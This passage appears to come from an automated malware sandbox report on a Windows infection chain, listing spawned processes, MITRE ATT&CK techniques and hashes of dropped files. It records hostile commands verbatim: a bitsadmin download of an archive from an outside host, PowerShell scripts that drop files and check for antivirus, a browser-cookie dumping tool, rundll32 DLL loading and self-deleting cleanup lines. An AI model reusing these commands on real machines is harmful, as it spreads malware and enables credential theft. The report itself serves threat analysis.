                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                              • Drops file in Program Files directory
                                                                                              PID:1172
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4152
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:7576
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:7684
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                  • Checks for any installed AV software in registry
                                                                                                  PID:7776
                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                  8⤵
                                                                                                  • Download via BitsAdmin
                                                                                                  PID:7880
                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9UiKUpbRlSaJBYc -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1500
                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:668
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:7604
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:7760
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:2008
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:7780
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:8016
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NCZgYfKnLJ\NCZgYfKnLJ.dll" NCZgYfKnLJ
                                                                                                          8⤵
                                                                                                            PID:4492
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NCZgYfKnLJ\NCZgYfKnLJ.dll" NCZgYfKnLJ
                                                                                                              9⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:4504
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:7568
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:7552
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:7940
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:8016
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                                                    8⤵
                                                                                                                      PID:696
                                                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                      8⤵
                                                                                                                        PID:2172
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                            2⤵
                                                                                                              PID:1968
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                                3⤵
                                                                                                                  PID:2360
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping 127.0.0.1
                                                                                                                    4⤵
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:2408
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2516
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Adds Run key to start application
                                                                                                                PID:2276
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  3⤵
                                                                                                                    PID:2388
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2264
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    3⤵
                                                                                                                      PID:2392
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      3⤵
                                                                                                                        PID:2908
                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe "-1460462062-8348142511522418921661070257-313802456796161458992273549454210893"
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2388
                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe "1857587856-1364315911142817824880360195410801326391970745870697996518-1391667580"
                                                                                                                    1⤵
                                                                                                                      PID:2284
                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe "16783738791316489019-130882472941699201-1914541224-9625726984056701761956514027"
                                                                                                                      1⤵
                                                                                                                        PID:2360
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "7799895301703693880743112179-17266698042034871697-12659377117112863772040841540"
                                                                                                                        1⤵
                                                                                                                          PID:3032
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2C1F.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2C1F.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:7788
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC9.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3BC9.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:4652
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6A97.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\6A97.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:8012
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                                            2⤵
                                                                                                                              PID:8152
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout 1
                                                                                                                                3⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:8180
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6A97.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\6A97.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Modifies system certificate store
                                                                                                                              PID:2680
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 6A97.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6A97.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                3⤵
                                                                                                                                  PID:7688
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /im 6A97.exe /f
                                                                                                                                    4⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:7888
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 6
                                                                                                                                    4⤵
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:7780
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\72A4.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\72A4.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:8092
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\72A4.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\72A4.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:8140
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7FFD.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7FFD.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2432
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4516
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:1932
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:7884
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:7664
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:7576
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:7736
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:1400
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:7972
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:7716

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                    Execution

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Persistence

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    1
                                                                                                                                    T1060

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Privilege Escalation

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Defense Evasion

                                                                                                                                    Modify Registry

                                                                                                                                    3
                                                                                                                                    T1112

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Install Root Certificate

                                                                                                                                    1
                                                                                                                                    T1130

                                                                                                                                    Credential Access

                                                                                                                                    Credentials in Files

                                                                                                                                    4
                                                                                                                                    T1081

                                                                                                                                    Discovery

                                                                                                                                    Software Discovery

                                                                                                                                    1
                                                                                                                                    T1518

                                                                                                                                    Security Software Discovery

                                                                                                                                    1
                                                                                                                                    T1063

                                                                                                                                    Query Registry

                                                                                                                                    4
                                                                                                                                    T1012

                                                                                                                                    System Information Discovery

                                                                                                                                    5
                                                                                                                                    T1082

                                                                                                                                    Peripheral Device Discovery

                                                                                                                                    2
                                                                                                                                    T1120

                                                                                                                                    Remote System Discovery

                                                                                                                                    1
                                                                                                                                    T1018

                                                                                                                                    Collection

                                                                                                                                    Data from Local System

                                                                                                                                    4
                                                                                                                                    T1005

                                                                                                                                    Command and Control

                                                                                                                                    Web Service

                                                                                                                                    1
                                                                                                                                    T1102

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files\Windows Defender\ROPRWXHFHR\ultramediaburner.exe
                                                                                                                                      MD5

                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                      SHA1

                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                      SHA256

                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                      SHA512

                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                    • C:\Program Files\Windows Defender\ROPRWXHFHR\ultramediaburner.exe
                                                                                                                                      MD5

                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                      SHA1

                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                      SHA256

                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                      SHA512

                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                    • C:\Program Files\install.dat
                                                                                                                                      MD5

                                                                                                                                      806c3221a013fec9530762750556c332

                                                                                                                                      SHA1

                                                                                                                                      36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                      SHA256

                                                                                                                                      9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                      SHA512

                                                                                                                                      56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                    • C:\Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                                                                      MD5

                                                                                                                                      15775d95513782f99cdfb17e65dfceb1

                                                                                                                                      SHA1

                                                                                                                                      6c11f8bee799b093f9ff4841e31041b081b23388

                                                                                                                                      SHA256

                                                                                                                                      477a9559194edf48848fce59e05105168745a46bdc0871ea742a2588ca9fbe00

                                                                                                                                      SHA512

                                                                                                                                      ac09ce01122d7a837bd70277badd58ff71d8c5335f8fc599d5e3ed42c8fee2108dd043bce562c82ba12a81b9b08bd24b961c0961bf8fd3a0b8341c87483cd1e7

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                      MD5

                                                                                                                                      4966cd4117fd2fc21094cd982cfabdb1

                                                                                                                                      SHA1

                                                                                                                                      5cc1c0c28e5fa5439413d3d6a797ae7f7293b2e7

                                                                                                                                      SHA256

                                                                                                                                      e30adb0398f0f10e587f55f450801ad75a79c206fb38735b74475f091d147a2e

                                                                                                                                      SHA512

                                                                                                                                      e567957acd6530530e5c006aaba485707b2894e8c4b72ae52dc98bd85a39503db9c2c35dd4d411748d083aadf631be26f8e65aa0add1c6f3720d2dce549ac013

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                      MD5

                                                                                                                                      6cfca052a0b886a13d792b291566be0f

                                                                                                                                      SHA1

                                                                                                                                      cc1bc7556c5f0c7760db9ea5d8c1ed7d57f30a9b

                                                                                                                                      SHA256

                                                                                                                                      90e6be0132bcac665ef5b2a1bcbff1676ca736e2babf74140b6ccfb7b8d6786a

                                                                                                                                      SHA512

                                                                                                                                      47ae5e948c977b18d52551e02e3d4e38a099ba5577531589fa895379482c1f6cd60baf985117b22d7038152a969b5862a7400f7aca4c8d9bcfd459388773806f

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                      MD5

                                                                                                                                      dc0cfbfeb05e5ab5bdf6adbe2a1dd43f

                                                                                                                                      SHA1

                                                                                                                                      d8463733016fcc1b93ef66bf120a972e9394b769

                                                                                                                                      SHA256

                                                                                                                                      d9acbed1fea4f4963b65a720413c04905226f264d15314f983a9fdc6122459d7

                                                                                                                                      SHA512

                                                                                                                                      549a12ddeaa10db5808f3c004fce59096b36a18af20ab9df2b67aa55adfde73ed4c67bb3138851b31c199a01e54c3f7dc29d62ea31501f6945d41e624cd2fbfa

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                      MD5

                                                                                                                                      dc0cfbfeb05e5ab5bdf6adbe2a1dd43f

                                                                                                                                      SHA1

                                                                                                                                      d8463733016fcc1b93ef66bf120a972e9394b769

                                                                                                                                      SHA256

                                                                                                                                      d9acbed1fea4f4963b65a720413c04905226f264d15314f983a9fdc6122459d7

                                                                                                                                      SHA512

                                                                                                                                      549a12ddeaa10db5808f3c004fce59096b36a18af20ab9df2b67aa55adfde73ed4c67bb3138851b31c199a01e54c3f7dc29d62ea31501f6945d41e624cd2fbfa

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\00-66988-68a-9d084-e405e718c6525\Sewopejuzhu.exe
                                                                                                                                      MD5

                                                                                                                                      1f19330a59c0369f5d0b77b02f275568

                                                                                                                                      SHA1

                                                                                                                                      0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                                                      SHA256

                                                                                                                                      f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                                                      SHA512

                                                                                                                                      3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\00-66988-68a-9d084-e405e718c6525\Sewopejuzhu.exe
                                                                                                                                      MD5

                                                                                                                                      1f19330a59c0369f5d0b77b02f275568

                                                                                                                                      SHA1

                                                                                                                                      0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                                                      SHA256

                                                                                                                                      f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                                                      SHA512

                                                                                                                                      3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\00-66988-68a-9d084-e405e718c6525\Sewopejuzhu.exe.config
                                                                                                                                      MD5

                                                                                                                                      98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                      SHA1

                                                                                                                                      f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                      SHA256

                                                                                                                                      8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                      SHA512

                                                                                                                                      95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7a-60e80-b88-007b7-a355c2a516f6a\Rotygoshaelae.exe
                                                                                                                                      MD5

                                                                                                                                      c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                                      SHA1

                                                                                                                                      c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                                      SHA256

                                                                                                                                      f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                                      SHA512

                                                                                                                                      32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7a-60e80-b88-007b7-a355c2a516f6a\Rotygoshaelae.exe
                                                                                                                                      MD5

                                                                                                                                      c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                                      SHA1

                                                                                                                                      c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                                      SHA256

                                                                                                                                      f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                                      SHA512

                                                                                                                                      32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7a-60e80-b88-007b7-a355c2a516f6a\Rotygoshaelae.exe.config
                                                                                                                                      MD5

                                                                                                                                      98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                      SHA1

                                                                                                                                      f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                      SHA256

                                                                                                                                      8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                      SHA512

                                                                                                                                      95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                      MD5

                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                      SHA1

                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                      SHA256

                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                      SHA512

                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                      MD5

                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                      SHA1

                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                      SHA256

                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                      SHA512

                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                      MD5

                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                      SHA1

                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                      SHA256

                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                      SHA512

                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                      MD5

                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                      SHA1

                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                      SHA256

                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

